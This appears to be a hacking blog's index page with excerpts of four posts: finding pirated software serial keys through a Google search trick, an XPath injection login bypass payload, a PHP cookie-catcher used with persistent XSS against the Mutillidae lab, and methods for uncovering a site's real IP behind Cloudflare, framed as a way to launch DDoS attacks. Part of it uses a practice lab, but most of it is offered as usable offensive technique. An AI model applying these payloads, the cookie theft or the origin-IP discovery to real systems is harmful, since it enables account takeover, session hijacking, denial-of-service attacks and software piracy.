HOW TO FIND SERIAL KEYS FROM GOOGLE

*** HOW TO FIND SERIAL KEYS FROM GOOGLE***
steps:-
1) go to google.com
2) write the name of the software you want key. and add 94FBR at the end

Eg :- if you want to find key of IDM then write " IDM 94FBR " (without quotes)

3) search it and you will find many sites with serial keys of that softwares

Read more ...

XPATH INJECTION TUTORIAL

XPATH INJECTION TUTORIAL

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )

Sample XML Document which we gonna use:-

<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Bypass Authentication:-

Browse to the login.php page; here we can see simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection


Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

Authentication Bypass
Privilege Escalation
Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

Using cookie
Using brute-force
Using SQL injection
(1)Authentication Bypass Using Cookie:-
As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Read more ...

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

All these methods are based on bad admin configurations, but still are quite common

If you want to find real I.P. address of website, which is hidden by CLOUDFLARE. It has came to my attention that many booters, hosts, malicious websites, and more use CloudFlare for DDoS Protection & Anti-Abuse Report Protection. With CloudFlare protection, it is difficult to get the hosts IP; therefore, it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain any website protected by CloudFlare's real IP, which can be used for whatever you desire!

METHOD 1:-

If you simply ping the domain , it will give i.p. which is not website`s real i.p. address. you should try following option to get real I.P. address of domain.

ping direct-connect.domain.com

             OR

ping direct.domain.com

             OR

ping ftp.domain.com

             OR

ping cpanel.domain.com

             OR

ping mail.domain.com

METHOD 2 :-

For a Long Aged Domain you can use netcraft toolbar to check real ip

For Example

Code:

http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Clearly We can see change in IP to a cloudflare one.

METHOD 3 :-

You can try bruteforcing DNS , some subdomain will have real IP of website.

For this purpose you need NMAP tools.

Open your terminal with root privellege & type following code

# nmap -sV -sS -F <target>

it will scan host & give results , it`s not give real i.p. of website.(but from this you can know weather website is protected by CLOUDFLARE or not)

Now type following code in terminal

# nmap --script dns-brute -sn <target>

it will give you real I.P. of website.


I made simple bash script which do all things for you.For more details click here.

IF all of above methods does not work ;then there is no admin misconfiguration. So you cannot find real I.P.

Read more ...